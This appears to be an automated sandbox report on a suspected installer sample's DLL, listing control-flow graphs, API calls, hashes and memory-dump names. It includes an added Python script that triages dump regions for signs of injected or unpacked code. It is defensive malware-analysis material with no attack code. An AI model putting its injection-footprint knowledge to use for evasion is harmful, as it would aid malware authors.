                                                                                                                control_flow_graph 4648 6c98aa7e-6c98aa9a 4649 6c98ac59 4648->4649 4650 6c98aaa0-6c98aaa2 4648->4650 4651 6c98ac5b-6c98ac5f 4649->4651 4652 6c98aac4-6c98aae5 4650->4652 4653 6c98aaa4-6c98aab7 call 6c97e7ff call 6c97e7ec call 6c97ef40 4650->4653 4654 6c98aaec-6c98aaf2 4652->4654 4655 6c98aae7-6c98aaea 4652->4655 4668 6c98aabc-6c98aabf 4653->4668 4654->4653 4657 6c98aaf4-6c98aaf9 4654->4657 4655->4654 4655->4657 4659 6c98ab0a-6c98ab1b call 6c98ac60 4657->4659 4660 6c98aafb-6c98ab07 call 6c989a89 4657->4660 4669 6c98ab5c-6c98ab6e 4659->4669 4670 6c98ab1d-6c98ab1f 4659->4670 4660->4659 4668->4651 4671 6c98ab70-6c98ab79 4669->4671 4672 6c98abb5-6c98abd7 WriteFile 4669->4672 4673 6c98ab21-6c98ab29 4670->4673 4674 6c98ab46-6c98ab52 call 6c98acd1 4670->4674 4678 6c98ab7b-6c98ab7e 4671->4678 4679 6c98aba5-6c98abb3 call 6c98b0e3 4671->4679 4675 6c98abd9-6c98abdf GetLastError 4672->4675 4676 6c98abe2 4672->4676 4680 6c98abeb-6c98abee 4673->4680 4681 6c98ab2f-6c98ab3c call 6c98b07b 4673->4681 4683 6c98ab57-6c98ab5a 4674->4683 4675->4676 4684 6c98abe5-6c98abea 4676->4684 4686 6c98ab80-6c98ab83 4678->4686 4687 6c98ab95-6c98aba3 call 6c98b2a7 4678->4687 4679->4683 4685 6c98abf1-6c98abf6 4680->4685 4691 6c98ab3f-6c98ab41 4681->4691 4683->4691 4684->4680 4692 6c98abf8-6c98abfd 4685->4692 4693 6c98ac54-6c98ac57 4685->4693 4686->4685 4694 6c98ab85-6c98ab93 call 6c98b1be 4686->4694 4687->4683 4691->4684 4696 6c98ac29-6c98ac35 4692->4696 4697 6c98abff-6c98ac04 4692->4697 4693->4651 4694->4683 4700 6c98ac3c-6c98ac4f call 6c97e7ec call 6c97e7ff 4696->4700 4701 6c98ac37-6c98ac3a 4696->4701 4702 6c98ac1d-6c98ac24 call 6c97e812 4697->4702 4703 6c98ac06-6c98ac18 call 6c97e7ec call 6c97e7ff 4697->4703 4700->4668 4701->4649 4701->4700 4702->4668 4703->4668
                                                                                                                APIs
                                                                                                                  • Part of subcall function 6C98ACD1: GetConsoleCP.KERNEL32(?,6C989EF0,?), ref: 6C98AD19
                                                                                                                • WriteFile.KERNEL32(?,?,6C99350C,00000000,00000000,?,00000000,00000000,6C9948D6,00000000,00000000,?,00000000,6C989EF0,6C99350C,00000000), ref: 6C98ABCF
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C99350C,6C989EF0,00000000,?,?,?,?,00000000,?), ref: 6C98ABD9
                                                                                                                • __dosmaperr.LIBCMT ref: 6C98AC1E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                                                                                • String ID: 8Q
                                                                                                                • API String ID: 251514795-4022487301
                                                                                                                • Opcode ID: d18bfe8a9d26315c303d93e8bb7d5411c7711ea75873f07f99bba6c9acc95976
                                                                                                                • Instruction ID: c8f6e5034fc06c78113e5631c7a76cb779e1f97e033d0eda70358042dec5db4e
                                                                                                                • Opcode Fuzzy Hash: d18bfe8a9d26315c303d93e8bb7d5411c7711ea75873f07f99bba6c9acc95976
                                                                                                                • Instruction Fuzzy Hash: AC51C571A06109AFDB01CFA8CC80BDEBBBAEF16718F140955E510ABA90DB74D94587A1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4715 6c9749b0-6c9749bc 4716 6c9749be-6c9749c9 4715->4716 4717 6c9749fd 4715->4717 4719 6c9749df-6c9749ec call 6c8401f0 call 6c97f938 4716->4719 4720 6c9749cb-6c9749dd 4716->4720 4718 6c9749ff-6c974a77 4717->4718 4721 6c974aa3-6c974aa9 4718->4721 4722 6c974a79-6c974aa1 4718->4722 4728 6c9749f1-6c9749fb 4719->4728 4720->4719 4722->4721 4725 6c974aaa-6c974b69 call 6c842250 call 6c842340 call 6c978199 call 6c83e010 call 6c975ea8 4722->4725 4728->4718
                                                                                                                APIs
                                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C974B51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                • API String ID: 323602529-1866435925
                                                                                                                • Opcode ID: 0c8aaade41a305511551c8c8e338311829f695b2652c4188466a58a754b1a661
                                                                                                                • Instruction ID: 46c0c14b79bc731e27ecccca16243e8779f45d1ea55b47003e1387bb06d4cede
                                                                                                                • Opcode Fuzzy Hash: 0c8aaade41a305511551c8c8e338311829f695b2652c4188466a58a754b1a661
                                                                                                                • Instruction Fuzzy Hash: A15134B5900B008FD729CF29C585797BBF1BB58318F048A2DD4864BB91D775E90ACFA0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4738 6c94c310-6c94c36c call 6c975990 4741 6c94c3c0-6c94c3c9 4738->4741 4742 6c94c410-6c94c415 4741->4742 4743 6c94c3cb-6c94c3d0 4741->4743 4744 6c94c4f8-6c94c4fd 4742->4744 4745 6c94c41b-6c94c420 4742->4745 4746 6c94c3d6-6c94c3db 4743->4746 4747 6c94c460-6c94c465 4743->4747 4752 6c94c5e6-6c94c5fd WriteFile 4744->4752 4753 6c94c503-6c94c508 4744->4753 4748 6c94c426-6c94c42b 4745->4748 4749 6c94c567-6c94c597 call 6c97a1c0 4745->4749 4754 6c94c3e1-6c94c3e6 4746->4754 4755 6c94c51d-6c94c531 WriteFile 4746->4755 4750 6c94c59c-6c94c5b4 4747->4750 4751 6c94c46b-6c94c470 4747->4751 4756 6c94c431-6c94c436 4748->4756 4757 6c94c36e-6c94c3b0 call 6c97a740 ReadFile 4748->4757 4749->4741 4760 6c94c5bc-6c94c5d0 4750->4760 4759 6c94c476-6c94c47b 4751->4759 4751->4760 4761 6c94c607-6c94c60c 4752->4761 4753->4761 4762 6c94c50e-6c94c513 4753->4762 4763 6c94c3ec-6c94c3f1 4754->4763 4764 6c94c53b-6c94c55f 4754->4764 4755->4764 4756->4741 4765 6c94c438-6c94c452 4756->4765 4773 6c94c3b3-6c94c3b8 4757->4773 4759->4741 4768 6c94c481-6c94c4ee WriteFile 4759->4768 4769 6c94c5d4-6c94c5e1 4760->4769 4761->4741 4770 6c94c612-6c94c620 4761->4770 4762->4755 4763->4741 4771 6c94c3f3-6c94c406 4763->4771 4764->4749 4765->4769 4768->4744 4769->4741 4771->4773 4773->4741
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: feab42ca6a17e95d1dddc2a84aea153a79b6a5b92137ee497332d801a4247bf9
                                                                                                                • Instruction ID: 9074ec1f338182aab6d6df4f53308ac0b84223125bd010d458a0ab1d2117b502
                                                                                                                • Opcode Fuzzy Hash: feab42ca6a17e95d1dddc2a84aea153a79b6a5b92137ee497332d801a4247bf9
                                                                                                                • Instruction Fuzzy Hash: A7717BB0208305AFD710DF18C480B9FBBF9BF89719F50892EF599C6660D775E8588B92

                                                                                                                 Control-flow Graph

                                                                                                                 Graph image omitted (the report colours executed and not-executed blocks). Function at 6C98A745: basic blocks span 6C98A745-6C98A7E0; calls sub_6C9903C2 from four sites, sub_6C99053F and sub_6C97E812 (__dosmaperr); CloseHandle in block 6C98A793-6C98A7A3, GetLastError in block 6C98A7A5-6C98A7AB.
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,6C99307F), ref: 6C98A79B
                                                                                                                • GetLastError.KERNEL32(?,00000000,?,6C99307F), ref: 6C98A7A5
                                                                                                                • __dosmaperr.LIBCMT ref: 6C98A7D0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                • String ID:
                                                                                                                • API String ID: 2583163307-0
                                                                                                                • Opcode ID: e2e4d4405e54eefbd70790a5005d9540da71db90d1fe2a88701627413b2cb8d1
                                                                                                                • Instruction ID: 89d61ac8b5a2045b38c2a35eb70be9f03e120fffeca449dc884e83a963e4b303
                                                                                                                • Opcode Fuzzy Hash: e2e4d4405e54eefbd70790a5005d9540da71db90d1fe2a88701627413b2cb8d1
                                                                                                                • Instruction Fuzzy Hash: EF014832B0726017CB01063A9885BAD27BC4B97F3CF2D4A59E929CBEC2DF61C8456291
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8Q
                                                                                                                • API String ID: 0-4022487301
                                                                                                                • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                                                                                • Instruction ID: df3f0ab4abcf05579f29376ac1405b8661196e8b41846a064ff72a93f29acd44
                                                                                                                • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                                                                                • Instruction Fuzzy Hash: 50F0D132A136105ACB351A3D8800BCA33A89FB233CF240B15E824A3ED0EB34D50A86B1
                                                                                                                APIs
                                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9748D4
                                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C974914
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                • String ID:
                                                                                                                • API String ID: 323602529-0
                                                                                                                • Opcode ID: bfcbcab9ebe4e4bef355eeb61ae60eaa6620c86df1b06d91f9b499d4d4bf8068
                                                                                                                • Instruction ID: 43236042b46f0b1d655345204229278060576d510bcf58f09071c0beb8c934e1
                                                                                                                • Opcode Fuzzy Hash: bfcbcab9ebe4e4bef355eeb61ae60eaa6620c86df1b06d91f9b499d4d4bf8068
                                                                                                                • Instruction Fuzzy Hash: 26514571101B40DBE335CF25C984BE6BBE4BB04718F448A1CE4AA4BAA1DB34F909CF90
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(6C9A4DD8,0000000C), ref: 6C97DD72
                                                                                                                • ExitThread.KERNEL32 ref: 6C97DD79
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorExitLastThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1611280651-0
                                                                                                                • Opcode ID: 031e38c5782f3c3f7f7dfa11f7618213c7c253a7c00181e3104377d868087169
                                                                                                                • Instruction ID: b5965532f9eef5c97d8a8cab9a1cacdd1ab7841c4bc5b51cc7f4d51201402d4b
                                                                                                                • Opcode Fuzzy Hash: 031e38c5782f3c3f7f7dfa11f7618213c7c253a7c00181e3104377d868087169
                                                                                                                • Instruction Fuzzy Hash: A6F0AFB5A05604AFDB159BB0D408AAE3B74FF61714F244589E006A7B50CB34E906CB60
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wsopen_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3347428461-0
                                                                                                                • Opcode ID: a9caad2b361d38039e4cf381ce6c3986849b4a2d614addc6a68db996fa945536
                                                                                                                • Instruction ID: d9db8f85f92d989cdb673293058cfd998fbddd99a2556772352eee73fe49ab8f
                                                                                                                • Opcode Fuzzy Hash: a9caad2b361d38039e4cf381ce6c3986849b4a2d614addc6a68db996fa945536
                                                                                                                • Instruction Fuzzy Hash: 85113671A0520AAFCB09CF98E94499F7BF8EF48318F154469F809AB311D670ED21DBA4
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free
                                                                                                                • String ID:
                                                                                                                • API String ID: 269201875-0
                                                                                                                • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                                                                                • Instruction ID: 5e944bcc22e2d232133a5b515083a5305576a52a5c03db00b5db20fb89be7296
                                                                                                                • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                                                                                • Instruction Fuzzy Hash: C8012C72D01159AFCF01DFE89C04AEE7FB9AB28214F144165E924A2290E731CA659B91
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,6C992F35,?,?,00000000,?,6C992F35,00000000,0000000C), ref: 6C993294
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 38d13fe1429614a731c87c9bb381f20caf9bd1e99edd26a65bec5b2af4f38995
                                                                                                                • Instruction ID: e155662e9346f861b93052a8be2634948191c865d0f368f42939fe6bcea1aba7
                                                                                                                • Opcode Fuzzy Hash: 38d13fe1429614a731c87c9bb381f20caf9bd1e99edd26a65bec5b2af4f38995
                                                                                                                • Instruction Fuzzy Hash: 5AD06C3210410DBBDF028E85DC06EDA3BAAFB48714F114000FA1856020C732E861AB90
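The Memory Dump Source entries above identify each dump by an eight-field file name. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it decodes those names into PID, region base, page protection and region type, and flags the dumps worth carving first (executable memory that is not image-backed, or that is writable as well as executable). The field layout is an assumption inferred from the names on this page; the protection and type fields are read as MEMORY_BASIC_INFORMATION.Protect and .Type because the values here (0x20 for the code section at 6C7F1000, 0x02 for the headers, 0x08 and 0x04 for the data sections, 0x01000000 for every region) match the winnt.h constants and the layout of a loaded DLL. The remaining fields are carried through undecoded, and the private RWX region in the sample input is constructed, not taken from the report.

```python
"""Decode Joe Sandbox .sdmp memory-dump names such as the ones listed under
"Memory Dump Source" in this report, and flag the regions worth carving first.

Assumed field layout (inferred from the names on this page, not taken from
Joe Sandbox documentation):

    <pid>.<f1>.<f2>.<region_base>.<protect>.<f5>.<type>.<f7>.sdmp

Only <pid>, <region_base>, <protect> and <type> are interpreted; <protect> and
<type> are read as MEMORY_BASIC_INFORMATION.Protect / .Type because the values
on this page (0x20, 0x02, 0x08, 0x04 and 0x01000000) match winnt.h constants.
f1, f2, f5 and f7 are carried through raw.
"""
import re
from dataclasses import dataclass

# winnt.h page-protection values (low byte of MEMORY_BASIC_INFORMATION.Protect)
PAGE_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# winnt.h region types (MEMORY_BASIC_INFORMATION.Type)
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

_H8 = r"[0-9A-Fa-f]{8}"
_NAME_RE = re.compile(
    rf"^(?P<pid>{_H8})\.(?P<f1>{_H8})\.(?P<f2>\d+)\.(?P<base>[0-9A-Fa-f]{{16}})\."
    rf"(?P<protect>{_H8})\.(?P<f5>{_H8})\.(?P<type>{_H8})\.(?P<f7>{_H8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    base: int
    protect: int
    mem_type: int
    raw: tuple  # (f1, f2, f5, f7) as found in the name; meaning not established here

    @property
    def protect_name(self) -> str:
        names = [PAGE_NAMES.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:02X}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    @property
    def type_name(self) -> str:
        return TYPE_NAMES.get(self.mem_type, f"0x{self.mem_type:08X}")

    @property
    def executable(self) -> bool:
        return (self.protect & 0xFF) in EXECUTABLE

    @property
    def writable(self) -> bool:
        return (self.protect & 0xFF) in WRITABLE


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split one .sdmp file name into its fields; raises ValueError on other names."""
    m = _NAME_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return DumpRegion(
        pid=int(m["pid"], 16),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["type"], 16),
        raw=(m["f1"], m["f2"], m["f5"], m["f7"]),
    )


def triage(names):
    """Return [(region, reason)] for dumps that deserve a first look.

    Executable memory that is not image-backed, or that is writable as well as
    executable, is the usual footprint of unpacked or injected code rather than
    of a normally loaded module, so those dumps are the ones to carve first."""
    hits = []
    for name in names:
        r = parse_sdmp_name(name)
        if r.executable and r.mem_type != MEM_IMAGE:
            hits.append((r, "executable region not backed by an image"))
        elif r.executable and r.writable:
            hits.append((r, "image region both writable and executable"))
    return hits


def describe(name: str) -> str:
    r = parse_sdmp_name(name)
    return f"pid {r.pid} base 0x{r.base:016X} {r.protect_name} {r.type_name}"


# Dump names as listed in this report (process 0xC, module loaded at 6C7F0000).
REPORT_DUMPS = [
    "0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp",
    "0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp",
    "0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp",
    "0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp",
]
# Constructed name (not from the report): a private RWX region, as unpacked code would leave.
CONSTRUCTED_PRIVATE_RWX = (
    "0000000C.00000002.1540000000.0000000002E30000.00000040.00000001.00020000.00000000.sdmp"
)

if __name__ == "__main__":
    for n in REPORT_DUMPS + [CONSTRUCTED_PRIVATE_RWX]:
        print(describe(n))
    for region, why in triage(REPORT_DUMPS + [CONSTRUCTED_PRIVATE_RWX]):
        print(f"carve first: 0x{region.base:016X} ({region.protect_name}, {region.type_name}): {why}")
```

On the names from this report the triage returns nothing, which is what a cleanly loaded DLL should look like: its code is PAGE_EXECUTE_READ and every region is MEM_IMAGE. A 0x40 or 0x80 protection on an image region, or any executable MEM_PRIVATE region, is the dump to open first when looking for the unpacked payload.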
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
